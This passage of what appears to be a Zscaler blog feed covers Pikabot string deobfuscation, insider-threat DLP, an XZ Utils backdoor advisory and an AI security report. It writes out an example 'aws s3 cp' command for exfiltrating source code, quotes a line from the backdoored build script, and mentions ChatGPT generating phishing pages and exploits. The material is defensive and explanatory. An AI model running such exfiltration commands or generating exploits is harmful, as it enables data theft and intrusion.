enhanced visibility into east-west traffic with discovery, classification and device inventory without the need for endpoint agents. We invite you to learn more about Airgap’s technology in an upcoming briefing on April 16th. Thu, 11 Apr 2024 05:00:00 -0700 Naresh Kumar https://www.zscaler.com/blogs/company-news/zscaler-acquires-airgap-networks-extends-zero-trust-sase https://www.zscaler.com/blogs/company-news/zscaler-is-showcasing-zero-trust-and-ai-at-the-2024-aws-summit-events-across-europe In today’s dynamic digital landscape, organizations are rapidly adopting artificial intelligence (AI) and Generative AI (GenAI) tools to increase productivity, gain new insights, and obtain a competitive advantage. The newly released Zscaler ThreatLabz 2024 AI Security Report sheds light on key trends, risks, and best practices in enterprise AI adoption, along with insights into AI-driven threats and key strategies to defend against them. Analyzing over 18 billion transactions from April 2023 to January 2024 across the Zscaler Zero Trust Exchange cloud security platform, some of the key findings are: Enterprise use of AI/ML tools has skyrocketed by nearly 600% 569 terabytes of enterprise data exchanged with AI tools ChatGPT usage has increased by 634%, even though it is also the most-blocked AI application by enterprise organizations AI is empowering threat actors in unprecedented ways This is not just a numerical phenomenon but represents a profound shift in the way organizations across industries and geographies are embracing AI technologies. However, with terabytes of data sent to various AI tools, the need for effective data protection measures is a top priority. Not only driven by the need to classify and protect sensitive data to prevent it from leaving the organization by mistake, but also to prevent data exfiltration caused by bad actors, malware, and new AI-powered threats. Never has the demand for robust cybersecurity been more important.Zscaler Leadership and Advantage: In AI, Data Wins Enabling more secure use of AI and GenAI tools in organizations and using AI to provide a stronger security posture are two crucial aspects in the modern landscape. An AWS Advanced Technology Partner, Zscaler has been a leader in zero trust for over a decade. As organizations wage the battle against cyberattacks, they must deploy robust defense systems, including zero trust architectures that utilize AI to effectively combat evolving threats, while keeping users productive. The best AI is powered by the best data, and that is what makes Zscaler stand out. Operating the world's largest security cloud and processing over 400 billion transactions daily, Zscaler ensures access to the most relevant cyber threat data. Prioritizing three key elements for effective enterprise AI – vast datasets exceeding 500 trillion daily signals, deep domain expertise, and a skilled team of data scientists, Zscaler leverages complete logs, full URL and anonymized data to train their LLMs. This approach ensures rich data for AI training, unlike DNS and firewall logs, which often lack detail or are blind to encrypted traffic. As a result, Zscaler continually improves its AI models with high-volume, high-quality data, empowering IT and security teams with valuable insights and solutions. Come and visit us at the 2024 AWS Summit events As apps move to the cloud, cyberattacks become more sophisticated, and users work from anywhere, using any device, perimeter security using VPNs and firewalls provide incomplete, inconsistent security and a poor user experience. With the Zero Trust Exchange powered by AI, Zscaler provides comprehensive visibility, control, and security for all cloud based applications within a unified platform. At the 2024 AWS Summit events, you can discover how Zscaler empowers organizations to: Improve security posture with zero trust Reduce attack surface and prevent lateral threats Accelerate migration of on-prem apps to AWS Enjoy fast, direct access to private apps and workloads Deploy AI-powered security for sensitive data, workloads, and GenAI data And more Visit us at the 2024 AWS Summit events, which include EMEA stops at: Amsterdam on April 9 London on April 24 Berlin on May 15-16 Milan on May 23 Stockholm on June 4 Madrid on June 5 The 2024 AWS Summits are free events that bring the cloud computing community together to connect, collaborate, and learn about AWS. Stop by our booth to learn more about Zscaler solutions for AWS and how to safely embrace GenAI tools, while leveraging AI for an improved security posture. To learn more about the 2024 EMEA AWS Summit events and to register, click here. And to learn more about Zscaler solutions for AWS visit our website. Tue, 09 Apr 2024 02:07:52 -0700 Yaroslav Rosomakho https://www.zscaler.com/blogs/company-news/zscaler-is-showcasing-zero-trust-and-ai-at-the-2024-aws-summit-events-across-europe https://www.zscaler.com/blogs/security-research/automating-pikabot-s-string-deobfuscation IntroductionPikabot is a malware loader that originally emerged in early 2023 with one of the prominent features being the code obfuscation that it leverages to evade detection and thwart technical analysis. Pikabot employed the obfuscation method to encrypt binary strings, including the address of the command-and-control (C2) servers. In this article, we briefly describe the obfuscation method used by Pikabot and we present an IDA plugin (with source code) that we developed to assist in our binary analysis. As mentioned in our previous article, the obfuscation method was removed when Pikabot remerged with a new version in early 2024. As of April 2024, this obfuscation method has not been used again in any Pikabot samples. Key Takeaways Pikabot is a malware loader that was first observed in early 2023 and became very active following the takedown of Qakbot in August 2023. Previous versions of Pikabot used advanced string encryption techniques, which have been replaced with simpler algorithms. Previously, the strings were encrypted using a combination of AES-CBC and RC4 algorithms. The string obfuscation’s implementation is similar to ADVobfuscator. In this article, we describe the binary strings’ obfuscation algorithm and our approach to decrypt the binary strings using IDA’s microcode. Zscaler ThreatLabz developed an IDA plugin to automatically decrypt Pikabot’s obfuscated strings and are releasing the source code. Technical AnalysisStrings obfuscationThe steps for decrypting a Pikabot string are relatively simple. Each string is decrypted only when required (in other words, Pikabot does not decrypt all strings at once). Pikabot follows the steps below to decrypt a string: Pushes on the stack the encrypted string array. Initializes the RC4 encryption algorithm. The RC4 key is different for each string (with very few exceptions). Pikabot takes the decrypted RC4 output, decodes it using Base64 after replacing all instances of the character ‘_’ (underscore) with ‘=’ (equal) and decrypts it using the AES-CBC algorithm. The AES key and initialization vector (IV) are the same for all strings. ANALYST NOTE: There are encrypted strings, which are encrypted only with the RC4 algorithm. Figure 1 shows the code used to decrypt the string, Kernel32.dll. Figure 1: Example Pikabot string decryption for Kernel32.dll.Figure 2 shows the function that first decrypts the AES key and IV. The RC4 decrypted string passed to the function is then Base64 decoded, and is finally decrypted using AES. Figure 2: Pikabot Base64 decoding and AES decryption function. Decrypting Pikabot stringsThe following information is required to decrypt a Pikabot string: The AES key and IV of a binary sample. The RC4 encrypted array of each string. The RC4 key of each encrypted string. The string’s size. Our approach relies on IDA’s microcode. This decision helped us with several problems such as: IDA’s microcode converts the assignment/copy of the RC4 key into a strcpy function. In the assembly level, this could either be multiple mov or rep instructions. As a result, it would make the detection and extraction harder and more challenging. Extracting the RC4 encrypted array. Since IDA reconstructs the stack, it makes it much easier to search and extract the encrypted array. IDA’s microcode brings other limitations (for example, decompilation failure for a function) but no such issues were encountered for the parts of the code we wanted to analyze. In the sections below, we describe how each component was extracted. Extracting the AES key/IVFor the extraction of the AES key and IV, we iterate all analyzed functions and discard any function, whose size is not in the range of 600 and 1,600 bytes. Next, we scan the functions for the following patterns: Existence of RC4 encryption. This is the same heuristic we use for detecting encrypted RC4 strings. Existence of values 0x3D and 0x5F (used before Base64 decoding the string) that are used with microcode opcodes m_stx and m_jnz respectively. Lastly, if all of the patterns above match, then the handler for decrypting a Pikabot string is invoked. For the classification of the key and the IV, we apply the following checks: The number of decrypted strings from the identified function must be two. Otherwise, the identified function is incorrect. The longest string is marked as the AES key (by taking the first 32-bytes) and the remaining decrypted string as the IV (by taking the first 16-bytes). Extracting the RC4 encrypted arrayPikabot constructs the RC4 encrypted array by pushing it onto the stack and then decrypting it. Our approach involves the following steps for detecting each part of the array: Use the detected RC4 encryption block address as a starting point. Search for the microcode opcode m_add in the decryption instruction. The detected microcode holds the starting stack offset of the encrypted array. Start iterating backwards and search for the microcode opcodes m_mov/m_call, the second opcode is used in case the data is copied via a strcpy or memcpy instruction. If the stack offset matches, then we save the data and update the stack offset. This process is repeated until the reconstructed encrypted array has the expected size. Extracting the RC4 encrypted array sizeThe length of the encrypted array is extracted in a similar way as the encrypted array. The detection pattern is: Use the detected RC4 encryption block address as a starting point. Search for the microcode opcodes m_jb, m_jae, and m_setb, and use the immediate constant number in the instruction as a size. Extracting the RC4 keyExtracting the RC4 key of each string proved to be the most challenging part while creating the plugin. In our first attempt, we were extracting the RC4 key after detecting the initialization of the RC4 algorithm. However, this approach had the following issues: Incorrect extraction of the RC4 key: In many cases, an invalid/junk string was placed in-between the correct RC4 key and the RC4 algorithm initialization. Incorrect detection of RC4 initialization code block: For example, if the size of the encrypted array was 256 bytes then an incorrect RC4 key would be detected. Instead of trying to detect the RC4 key by detecting the initialization of the RC4 algorithm, we decided to extract all strings from each targeted function. Then, we decrypted the RC4 encrypted array with each extracted RC4 key and validated the decrypted output by applying the following checks: If it matches the expected string size. If all characters of the string are readable. ANALYST NOTE: After successful decryption, the RC4 key is marked and not reused in order to limit any false-positives. For example, if the decrypted string does not have any junk characters. IDA PluginWe tested our Pikabot plugin with IDA versions 8 and newer. The plugin can be executed by compiling the source code using IDA's SDK and/or copying the generated DLL into the IDA plugins folder. After a Pikabot sample is loaded, the user can decompile a function and right-click in the decompiled output and either choose to decrypt strings in the current function or in all of them (Figure 3). Figure 3: IDA Pikabot plugin options. For each decrypted string, the plugin sets a comment in the decompiled output. Figure 4 shows a function with the obfuscated strings before the plugin is invoked. Figure 4: Before running the Pikabot string decryption plugin. Figure 5 shows the output after our Pikabot IDA plugin is executed. Figure 5: Output after running the Pikabot string decryption plugin. Source CodeThe source code for our IDA plugin to deobfuscate Pikabot strings can be found at this GitHub repository. ConclusionOlder Pikabot variants include a string obfuscation implementation, which can make automation a complicated task. By using IDA’s microcode and developing our own plugin, we were able to speed up our analysis in most cases and analyze the code much faster. Since this technique is no longer used by Pikabot, we decided to open source our IDA plugin to assist the research community with defeating current and future stack-based obfuscation techniques. Zscaler CoverageIn addition to sandbox detections, Zscaler’s multilayered cloud security platform detects indicators related to Pikabot at various levels with the following threat names: Win32.Trojan.PikaBot Win32.Downloader.PikaBot Indicators Of Compromise (IOCs)The following samples were used for testing the plugin. SHA256DESCRIPTIONaebff5134e07a1586b911271a49702c8623b8ac8da2c135d4d3b0145a826f507Pikabot Sample4c53383c1088c069573f918c0f99fe30fa2dc9e28e800d33c4d212a5e4d36839Pikabot Sample15e4de42f49ea4041e4063b991ddfc6523184310f03e645c17710b370ee75347Pikabot Samplee97fd71f076a7724e665873752c68d7a12b1b0c796bc7b9d9924ec3d49561272Pikabot Samplea9f0c978cc851959773b90d90921527dbf48977b9354b8baf024d16fc72eae01Pikabot Sample1c125a10c33d862e6179b6827131e1aac587d23f1b7be0dbcb32571d70e34de4Pikabot Sample62f2adbc73cbdde282ae3749aa63c2bc9c5ded8888f23160801db2db851cde8fPikabot Sampleb178620d56a927672654ce2df9ec82522a2eeb81dd3cde7e1003123e794b7116Pikabot Sample72f1a5476a845ea02344c9b7edecfe399f64b52409229edaf856fcb9535e3242Pikabot SampleAcknowledgmentsThe following projects were the initial inspiration for developing our plugin. In addition, they assisted with the usage of IDA’s SDK: HexRaysDeob - by Rolf Rolles Goomba - by Hex-Rays Mon, 08 Apr 2024 08:31:02 -0700 Nikolaos Pantazopoulos https://www.zscaler.com/blogs/security-research/automating-pikabot-s-string-deobfuscation https://www.zscaler.com/blogs/product-insights/join-zscaler-future-digital-experience-monitoring-event It's time to register for the Future of Digital Experience Monitoring event. Here are a few reasons why you can’t miss it! See what it takes to keep end users productive no matter the device, network, or application.Zscaler Digital Experience (ZDX) is built on a foundation that goes beyond siloed monitoring solutions to provide full end-to-end visibility across devices (CPU, memory, Wi-Fi), networks (corporate or public internet), and applications (public or private). Zscaler Digital Experience end-to-end data path Find out what’s behind the high-confidence results delivered by advanced machine learning models.Machine learning models that provide high-confidence results require an immense amount of data and training, which can't be built overnight. ZDX is powered by the industry’s largest inline security cloud, with 500 trillion daily signals feeding high-quality data to sophisticated AI models. Zscaler Zero Trust Exchange Learn about key ZDX AI capabilities already making an impact for many service desk and network operations teams.Incident Dashboard includes machine learning models to detect issues across last mile and intermediate ISPs, application, Wi-Fi, Zscaler data center, and endpoints with correlation. This enables Network Operations to quickly and efficiently find root cause and focus on restoring reliable connectivity. ZDX Incidents Dashboard ZDX Self Service empowers users to fix problems that impact their digital experience, if the causes are under their control. A lightweight AI engine runs in Zscaler Client Connector and notifies the user of issues such as poor Wi-Fi or high CPU utilization, and then offers ways to resolve the issue, reducing help tickets. ZDX Self Service Notifications Automated Root Cause Analysis reduces strain on service desk and operations teams by identifying root causes of issues—such as high CPU usage, Wi-Fi latency spikes on local routers, slow application response times, and more—that would typically require expert IT knowledge and multiple dashboards. Users can get back to work more quickly and with fewer IT tickets, which tend to spike as users increasingly connect from anywhere using various devices, Wi-Fi access points, ISPs, zero trust environments, and applications. ZDX Automated Root Cause Analysis Join our upcoming webinar eventAs organizations strive to optimize digital experiences and ensure secure access to applications and data, the future of digital experience monitoring lies in leveraging advanced AI capabilities. With consolidated digital experience monitoring integrated in a zero trust architecture, IT teams can resolve issues more quickly to enhance performance, reduce costs, and deliver exceptional user experiences. Join our upcoming webinar to discover how ZDX can transform your organization's digital experience monitoring strategy and drive superior business results. Register now Dates and times: Americas: Thursday, April 25 | 11 a.m. PT EMEA: Tuesday, April 30 | 10 a.m. BST APAC: Tuesday, April 30 | 10 a.m. IST Featured speakers: Dhawal Sharma, SVP & GM, Product Management, Zscaler Javier Rodriguez, Sr. Director., Product Management, Zscaler Wed, 03 Apr 2024 08:03:01 -0700 Rohit Goyal https://www.zscaler.com/blogs/product-insights/join-zscaler-future-digital-experience-monitoring-event https://www.zscaler.com/blogs/product-insights/betrayal-cloud-unmasking-insider-threats-and-halting-data-exfiltration Introduction In today’s digital world, safeguarding sensitive data, such as source code, is crucial. Insider threats are a worthy adversary, posing significant risk, especially with trusted employees having access to valuable repositories. This article explores how a fictitious software development company could use Zscaler security solutions to stop insider attempts to upload source code. By using Zscaler Workload Communications, the fictitious company detects and prevents unauthorized uploads, ensuring the security of its intellectual property. Insider Threat in the Cloud and How to Stop Them A fictitious software development company relies on its source code repository as the lifeblood of its operations. Trusted employees have access to this repository to facilitate collaboration and innovation. To mitigate the risk of insider threats, the fictitious company implements Zscaler security solutions. Let’s explore how our products thwart an insider’s attempt to upload source code to an unauthorized destination. Attack Chain Use Case StepsTrusted employee access: A trusted employee (insider) has access to the source code repository, enabling them to complete their job responsibilities. A simplified example of source code is shown below: Insider threat incident: The trusted employee with legitimate access decides to misuse their privileges by attempting to upload source code files to an unauthorized destination—an AWS S3 bucket, with the intention of unauthorized sharing. or user:~$ aws s3 cp sourcecode.c s3://bucket/uploads/sourcecode.c Figure 1: This diagram depicts how Zscaler blocks insider threats Integration with Zscaler Workload Communications: The fictitious company’s source code repository is configured to route all outbound traffic through Zscaler Workload Communications, ensuring that data transmissions undergo rigorous inspection and security policies are enforced. ZIA DLP engine implementation: ZIA leverages its powerful inline data loss protection (DLP) engine to analyze data traffic in real time. ZIA’s DLP policies are designed to identify and and prevent unauthorized attempts to upload source code files to external storage spaces. An example of DLP configuration options is shown below. Figure 2: An example of DLP configuration options. Detection and prevention of file upload attempts: As an insider attempts to upload source code files to the unauthorized AWS S3 bucket, ZIA’s DLP engine detects it as a violation of security policies. Leveraging advanced pattern recognition and behavior analysis, ZIA blocks the upload attempt in real time, preventing the exfiltration of company data. The figure below shows the source code file upload attempt failing in real time. Figure 2: The source code file upload command receives an error when executed The upload attempt, which was in violation of company policy, appears in descriptive log records, as shown below. Figure 3: A log showing the failed source code file upload, along with important details like user, location, and destination Alerting and response: The Zscaler security platform generates immediate alerts upon detecting the unauthorized upload attempt. How Zscaler Can HelpZscaler’s security products offer effective solutions against insider threats aimed at source code repositories: Outbound Data Violation TriggerBy routing through Zscaler’s Cloud Connector, organizations can enforce security policies on all outbound data transmissions, including those from source code repositories. This integration ensures that every upload attempt undergoes through security checks, regardless of the destination. Data Breach PreventionZscaler Internet Access (ZIA) features a powerful data loss prevention (DLP) engine that analyzes data in real time. Leveraging advanced DLP policies, ZIA can detect patterns indicative of unauthorized source code uploads. This approach enables organizations to prevent data breaches before they occur. Instant Alerts The Zscaler platform provides real-time monitoring of all network activity, including access to source code repositories. Any suspicious behavior, such as attempts to upload source code to unauthorized destinations, triggers immediate alerts. This allows security teams to respond promptly and prevent potential data exfiltration. ConclusionWith cybersecurity threats on the rise, organizations must combat insider risks effectively. Zscaler solutions offer proactive measures against insider threats, as demonstrated by the hypothetical use case outlined above. By implementing robust DLP policies and real-time monitoring, organizations can protect their critical data unauthorized access and maintain data integrity. The Zscaler platform equips organizations to tackle insider threats confidently, securing their digital assets effectively. Tue, 02 Apr 2024 13:31:17 -0700 Sakthi Chandra https://www.zscaler.com/blogs/product-insights/betrayal-cloud-unmasking-insider-threats-and-halting-data-exfiltration https://www.zscaler.com/blogs/product-insights/exposing-dark-side-public-clouds-combating-malicious-attacks-workloads IntroductionThis article compares the cybersecurity strategies of a company that does not use Zscaler solutions with one that has implemented Zscaler's offerings. By exploring two different scenarios, we will highlight the advantages of Zscaler zero trust for workload communications and its specific use of data loss prevention. Threat Propagation Without Zscaler IntegrationLateral Movement Between WorkloadsIn the following scenario, you’ll see that without Zscaler’s integration, the organization is unable to detect or prevent threats effectively. This allows attackers to move laterally and exfiltrate data undetected, leading to significant security risks. Workload 1 in Azure West sends an HTTP GET request to GitHub for a patch update: Workload 1, deployed in Azure West, initiates an outbound connection to GitHub to fetch a required patch update. This HTTP GET request is sent to Github to download the patch: An HTTP response containing malware from GitHub: Unbeknownst to the organization, the HTTP response received from GitHub contains embedded malware. Attacker’s lateral movement to Workload 2: By exploiting the malware present in the HTTP response, an attacker gains access to Workload 1 and subsequently moves laterally to Workload 2 within the Azure West environment. From here, the attacker exploits vulnerabilities or misconfigurations in Workload 2 to achieve a network foothold and establish persistence in Workload 2 that further their malicious objectives. Data Exfiltration to a command-and-control (C2) server: With access to Workload 2, the attacker exfiltrates sensitive data from the organization’s environment to a remote C2 server. Threat Containment with Zscaler IntegrationIn the following scenario, Zscaler’s integrated security platform provides comprehensive protection against various stages of the attack life cycle. Organizations can use Zscaler Internet Access (ZIA), coupled with Zscaler Data Loss Prevention (DLP) and Zscaler Workload Communications to implement: Strict access controls Malware detection and prevention measures Workload segmentation Enhanced outbound security measures to GitHub (internet): With Zscaler integrated into the organization’s infrastructure, outbound traffic from Workload 1 to GitHub is subjected to stringent access control policies. Only approved URIs are permitted, which ensures communications are limited to trusted destinations. Any attempt to access unauthorized URIs is blocked. Malware detection and prevention: Zscaler’s security layers, including content inspection and advanced cloud sandbox features, intercept and inspect the HTTP response from GitHub in real time. Upon detecting malware, Zscaler halts transmission, preventing Workload 1 from being compromised. Workload segmentation to prevent lateral movement: Zscaler enforces strict segmentation policies ensuring that Workload 1 and Workload 2, which are deployed across two different regions, are treated as private applications with no direct communication allowed between them. Such segmentation effectively isolates these workloads, preventing any lateral threat movement between them. Egress traffic security from Workload 2 with advanced data protection: Egress traffic from Workload 2 is safeguarded using ZIA advanced protection capabilities. Zscaler ensures that sensitive data is not exfiltrated from the organization's environment. By enforcing DLP policies, Zscaler prevents unauthorized data transfers. ConclusionThe deployment of Zscaler’s solutions significantly enhanced the organization’s ability to combat cyberthreats and safeguard public cloud workloads. Without Zscaler, companies face unmonitored outbound traffic, susceptibility to malware infiltration, and the risk of lateral movement and data exfiltration. With Zscaler zero trust for workloads, organizations enjoy comprehensive protection, including access control policies, malware detection and prevention, segmentation to prevent lateral movement, and advanced data protection measures. Implementing Zscaler solutions enables organizations to bolster their cybersecurity defenses, mitigate risks, and protect their intellectual property from evolving threats in an interconnected digital environment. Tue, 02 Apr 2024 19:14:07 -0700 Sakthi Chandra https://www.zscaler.com/blogs/product-insights/exposing-dark-side-public-clouds-combating-malicious-attacks-workloads https://www.zscaler.com/blogs/security-research/cve-advisory-cve-2024-3094-security-compromise-xz-utils IntroductionOn March 29th, a security incident surfaced involving XZ Utils, a widely utilized data compression package integrated into major Linux distributions. Malicious code, allowing unauthorized remote SSH access, was discovered within versions 5.6.0 and 5.6.1 of XZ Utils. This exploit has been formally identified as CVE-2024-3094 and assigned a critical CVSS score of 10. BackgroundXZ Utils fell victim to a sophisticated supply chain attack where attackers targeted the liblzma library, a crucial dependency utilized by OpenSSH. This attack allowed for the injection of code into an OpenSSH server, resulting in the potential for remote code execution (RCE). The liblzma build process employs a series of intricate obfuscations to extract a prebuilt object file from a disguised test file within the source code. This object file is then utilized to modify specific functions within the liblzma library. Any software utilizing this modified version of the liblzma library is susceptible to data interception, modification, and breaches. The malicious code was promptly discovered, and infected only the two most recent versions of the package, 5.6.0 and 5.6.1, both of which were released within the last month. Affected VersionsThe following table describes impacted distributions, along with a corresponding recommendation for each distribution. DistributionAffected SystemsAffected PackagesRecommendationAlpine LinuxEdge (active development) xz 5.6.1-r0 xz 5.6.1-r1 Upgrade immediately to the latest version, 5.6.1-r2.Arch LinuxN/A5.6.0-1, 5.6.1-1, and/or any release item that matches the following criteria: Installation medium 2024.03.01 Virtual machine images 20240301.218094 and 20240315.221711 Container images created between and including 2024-02-24 and 2024-03-28 Upgrade immediately to the latest version, 5.6.1-2.DebianDebianUnstable (aka “Sid”) *This is a testing, unstable, & experimental version. xz-utils 5.5.1alpha-0.1(uploaded on 2024-02-01), up to and including 5.6.1-1.Revert to 5.4.5 or upgrade to 5.6.1+really5.4.5-1. Note: No stable Debian versions are known to be impacted. Any compromised packages were part of Debian testing. KaliN/Axz-utils 5.6.0-0.2 and/or any Kali installation updates made between March 26th and March 29th.Apply the latest updates if you updated between March 26th and March 29th.openSUSE MicroOS Tumbleweed 5.6.0, and/or any updates that occurred between March 7th and March 28th.Revert to 5.4.x. Note: For Tumbleweed users, you also have the option to upgrade to a new Tumbleweed snapshot (20240328 or later) containing the reversed version 5.6.1.revertto5.4 Red Hat Fedora 40*, 41 Fedora Rawhide *Updated March 30, 2024: Fedora 40 beta does contain two affected versions of xz libraries - xz-libs-5.6.0-1.fc40.x86_64.rpm and xz-libs-5.6.0-2.fc40.x86_64.rpm. At this time, Fedora 40 does not appear to be affected by the actual malware exploit, but all Fedora 40 beta users are encouraged to revert to 5.4.x versions. xz-5.6.0 xz-5.6.1 Revert to 5.4.x. Note: RedHat has advised users to immediately stop any instances of Fedora 41 or Fedora Rawhide, until XZ packages are reverted to safe versions. Red Hat Enterprise Linux (RHEL) was not impacted by this vulnerability. Table 1: A table listing impacted distributions, operating systems, and packages, along with recommendations to address the vulnerability. Technical DetailsThe goal of the malicious backdoor implementing CVE-2024-3094 is to inject code into an OpenSSH server (SSHD) running on the victim's machine and allow remote attackers (who possess a certain private key) to send an arbitrary payload via SSH, which is executed before the authentication step and executes commands on the victim’s machine. This supply chain attack uses multiple stages to decrypt obfuscated payloads and modify the build process of the XZ Utils tools. The obfuscated/encrypted stages and later binary backdoor are hidden in these two test files: tests/files/bad-3-corrupt_lzma2.xz tests/files/good-large_compressed.lzma The figure below depicts the attack sequence an attacker could exploit. Figure 1: A diagram of the attack flow. The build process uses the following command to ensure that the victim’s system is running on Linux and possesses a x86_64 architecture: if ! (echo "$build" | grep -Eq "^x86_64" > /dev/null 2>&1) && (echo "$build" | grep -Eq "linux-gnu$" > /dev/null 2>&1); thenIn addition, the build process checks whether the .rpm package is Debian or Red Hat-based. It also inspects certain environmental variables such as TERM and LANG. The TERM variable is set after SSH client and server authentication. The malicious payload verifies that the TERM variable is not set and that the LANG variable is set, and ensures that the running binary is /usr/sbin/sshd as it won’t be relevant with other binaries. After deciphering and decompressing the malicious payload over multiple stages, the payload is injected into liblzma. The payload modifies the behavior of the RSA_public_decrypt function, which is used in verification of signatures. The payload decrypts the RSA public modulus N value from the attacker’s request and decrypts it using the ChaCha20 symmetric stream cipher. The validation of the decrypted data is done using the Ed448 elliptic curve signing algorithm. Then, the decrypted payload is executed on the user’s SSH server. The backdoor contains only the public key, which ensures that only the attackers can generate valid payloads for the backdoor. The signature is bound to the host’s public key, meaning that a valid signature for one host cannot be reused for a different host. RecommendationsIn response to this threat, the Cybersecurity and Infrastructure Security Agency (CISA) has issued directives for affected individuals and organizations. XZ Utils developers and users are strongly advised to downgrade to a trusted, unaffected version of XZ Utils predating 5.6.0, such as 5.4.6 stable, or upgrade to a newer fixed version, if available. Additionally, thorough audits of system logs and network traffic are encouraged to identify any signs of suspicious activity. Any findings should be promptly reported to CISA for further investigation. How To Detect CVE-2024-3094To check if your version of XZ Utils is impacted (5.6.0 or 5.6.1) run the following command: $(which xz) --version | grep '5\.6\.[01]' Zscaler CoverageThe Zscaler ThreatLabz team has deployed protection.Zscaler Advanced Threat Protection: Linux.Exploit.CVE-2024-3094 Zscaler continues to monitor activities, through our telemetry data, potentially exploiting this vulnerability. References https://jfrog.com/blog/xz-backdoor-attack-cve-2024-3094-all-you-need-to-know/#who-is-affected-by-cve-2024-3094 https://www.redhat.com/en/blog/urgent-security-alert-fedora-41-and-rawhide-users https://vulcan.io/blog/alert-cve-2024-3094 https://news.opensuse.org/2024/03/29/xz-backdoor/ https://pkgs.alpinelinux.org/package/edge/main/x86/xz https://lists.debian.org/debian-security-announce/2024/msg00057.html Mon, 01 Apr 2024 17:23:11 -0700 Varun Sandila https://www.zscaler.com/blogs/security-research/cve-advisory-cve-2024-3094-security-compromise-xz-utils https://www.zscaler.com/blogs/security-research/new-ai-insights-explore-key-ai-trends-and-risks-threatlabz-2024-ai-security Today, Zscaler ThreatLabz released its inaugural ThreatLabz 2024 AI Security Report. This report comes at a key inflection point: as AI tools and language models (LLMs) like ChatGPT weave their way into the fabric of enterprise life, questions around how to securely enable these AI tools and protect enterprise data remain unanswered. Complicating matters, AI is also driving a new generation of cyber threats, enabling adversaries to launch attacks at greater speed, sophistication, and scale. As a result, enterprises must take the right steps to both securely enable AI productivity tools within the business and leverage AI to defend against a new landscape of AI-driven threats. The Zscaler ThreatLabz 2024 AI Security report draws on more than 18 billion transactions in the Zscaler Zero Trust Exchange™, from April 2023 to January 2024. The report uncovers key trends, risks, and best practices in the ways that enterprises are adopting — and blocking — AI applications across industry verticals and around the world. Meanwhile, ThreatLabz also offers insight into the evolving AI threat landscape and real-world AI threat scenarios, before providing key security best practices for defending against them (including with AI). Download the Zscaler Zscaler ThreatLabz 2024 AI Security Report to uncover data-driven AI insights and enterprise best practices for securing AI. Key ThreatLabz AI FindingsExplosive AI growth: Enterprise AI/ML transactions surged by 595% between April 2023 and January 2024. Concurrent rise in blocked AI traffic: Even as enterprise AI usage accelerates, enterprises block 18.5% of all AI transactions, a 577% increase signaling rising security concerns. Primary industries driving AI traffic: manufacturing accounts for 21% of all AI transactions in the Zscaler security cloud, followed by Finance and Insurance (20%) and Services (17%). Clear AI leaders: the most popular AI/ML applications for enterprises by transaction volume are ChatGPT, Drift, OpenAI, Writer, and LivePerson. Global AI adoption: the top five countries generating the most enterprise AI transactions are the US, India, the UK, Australia, and Japan. A new AI threat landscape: AI is empowering threat actors in unprecedented ways, including for AI-driven phishing campaigns, deepfakes and social engineering attacks, polymorphic ransomware, enterprise attack surface discovery, exploit generation, and more. Enterprise decision point: when to allow AI apps, when to block them, and how to mitigate ‘shadow AI’ risk One key theme in the report is that, to reap the full transformative potential of AI, enterprises must work to securely enable AI — that is, to minimize the risks associated with integrating and developing AI tools, while devising strategies to prevent or curtail an explosion of unapproved AI tools in the enterprise, a trend dubbed ‘shadow AI’. In general, enterprises can think about these risks as falling into three broad categories: Protecting sensitive data: Generative AI tools can inadvertently leak sensitive and confidential information, making data protection measures crucial. In fact, sensitive data disclosure is number six on the Open Worldwide Application Security Project (OWASP) Top Ten for AI Applications. Apart from adversarial threats like prompt injection attacks or malware, the biggest risks can stem from well-meaning users who inadvertently expose sensitive or proprietary data to large language models (LLMs). There are numerous ways that enterprise users may unknowingly do this, such as, for example, an engineer asking a gen AI tool to optimize or refactor proprietary code, or a sales team member asking an AI to use historical sales figures to forecast future pipeline. Enterprises should implement robust AI policy guidelines and technology-based data loss prevention (DLP) measures to prevent accidental data leaks and breaches. Meanwhile, they should also gain deep visibility into AI app usage to prevent or mitigate shadow AI, with granular access controls that ensure users only leverage approved AI applications. Data privacy and security risks of AI apps: Not all AI applications have the same level of data privacy and security. Terms, conditions, and policies can vary greatly, and enterprises should consider whether their data, for example, will be used to train language models, mined for advertising, or sold to third parties. Enterprises must assess and assign security risk scores to the AI applications they use, considering factors like data protection and the security practices of the companies behind them. Data quality and poisoning concerns: The quality and scale of data used to train AI applications directly impact the reliability of AI outputs. Enterprises should carefully evaluate the data quality when selecting an AI solution and establish a strong security foundation to mitigate risks like data poisoning. The new era of AI-driven threatsThe risks of AI are bi-directional: from outside enterprise walls, businesses face a continuous wave of threats that now includes AI-driven attacks. The reality is that virtually every type of existing threat can be aided by AI, which translates to attacks being launched at unprecedented speed, sophistication, and scale. Meanwhile, the future possibilities are limitless — meaning that enterprises face an unknown set of unknowns, when it comes to AI-driven cyber attacks. Still, clear attack patterns are emerging. In the 2024 AI Security Report, ThreatLabz provides insights into numerous evolving threats types, including: AI impersonation: AI deepfakes, sophisticated social engineering attacks, misinformation, and more. AI-generated phishing campaigns: end to end campaign generation, along with a ThreatLabz case study in creating a phishing login page using ChatGPT — in seven simple prompts. AI-driven malware and ransomware: how threat actors are leveraging AI automation across numerous stages of the attack chain. Using ChatGPT to generate vulnerability exploits: ThreatLabz shows how easy it is to create exploit PoCs, in this case for Log4j (CVE-2021-44228) and Apache HTTPS server path traversal (CVE-2021-41773) Dark chatbots: diving into the proliferation of dark web GPT models like FraudGPT and WormGPT that lack security guardrails. And much more… Best practices for secure AI transformation and layered AI + zero trust cyber defenseThe transformative power of AI is undeniable. To reap its enormous potential, enterprises must overcome the bi-directional set of risks that AI creates, namely: Securely enabling AI: protecting enterprise data while ushering in transformative productivity changes. Using AI to fight AI: using the power of enterprise security data to drive AI threat prevention across the attack chain, deliver real-time security insights, and fast-track zero trust. To that end, the Zscaler ThreatLabz 2024 AI Security Report offers key guidance, including: How to securely enable ChatGPT: a best practice case study for securing generative AI tools, in five steps. AI best practices and AI policy guidelines: AI frameworks and best practices that any enterprise can adopt. How Zscaler use AI to stop cyber threats: leveraging AI detections across each stage of the attack chain, with holistic visiblity into enterprise cyber risk How Zscaler enables secure AI transformation: the key capabilities that enterprises require to securely embrace genAI and ML tools, including: Full visibility into AI tool usage Granular access policy creation for AI Granular data security for AI applications Powerful controls with browser isolation Of course, AI begins and ends with the power of data. To dive deeper, download your copy of the Zscaler ThreatLabz 2024 AI Security Report or register for our live session with Zscaler CSO Deepen Desai, Navigating the AI Security Horizon: Insights from the Zscaler ThreatLabz 2024 AI Security Report. Meanwhile, if you want more information on how Zscaler is harnessing 